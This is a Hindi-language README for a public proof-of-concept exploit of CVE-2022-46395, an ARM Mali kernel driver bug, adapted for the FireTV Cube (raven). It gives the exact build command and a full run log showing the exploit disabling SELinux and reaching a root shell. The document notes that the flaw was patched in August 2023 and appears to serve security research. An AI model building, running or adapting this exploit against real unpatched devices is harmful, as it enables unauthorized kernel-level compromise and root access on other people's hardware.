
FireTV 2nd gen Cube (raven) के लिए CVE-2022-46395 POC
यह सुरक्षा शोधकर्ता मैन यू मो के पिक्सेल 6 POC का एक फोर्क है जो CVE-2022-46395 के लिए है। इस भेद्यता के बारे में उनका विस्तृत लेख यहाँ पढ़ें। FireOS के 32-बिट उपयोगकर्ता स्थान को ध्यान में रखते हुए परिवर्तन किए गए हैं। POC ARM Mali कर्नेल ड्राइवर में एक बग का शोषण करके मनमाना कर्नेल कोड निष्पादन प्राप्त करता है, जिसका उपयोग SELinux को अक्षम करने और रूट प्राप्त करने के लिए किया जाता है।
शोषण को PS7652/3564 (अगस्त 2023 के अंत) में पैच किया गया था। संदर्भ के लिए, ndk-21 में clang के साथ संकलित करने के लिए निम्न कमांड का उपयोग किया गया था:
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o raven_buf
सबसे तेज़ परिणामों के लिए, एक ताज़ा रिबूट के बाद चलाएं। औसतन POC को रूट प्राप्त करने में 2-5 मिनट लगते हैं।
raven:/ $ /data/local/tmp/raven_buf
Amazon/raven/raven:9/PS7646.3565N/0028085972224:user/amz-p,release-keys
benchmark_time 138
failed after 100
finished reset: 342278966 fault: 338143633 195 err 0 read 3
failed to find pgd, retry
finished reset: 731402639 fault: 724605931 208 err 0 read 3
failed to find pgd, retry
finished reset: 67309348 fault: 66434848 210 err 0 read 3
failed to find pgd, retry
failed after 200
failed after 300
benchmark_time 135
failed after 400
failed after 500
failed after 600
benchmark_time 131
failed after 700
finish reset: 797174916 fault: 788811083 352 err 0 read 3
found pgd at page 6
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001d0 1d0
overwrite addr : 1043001d0 1d0
result 50
raven:/ #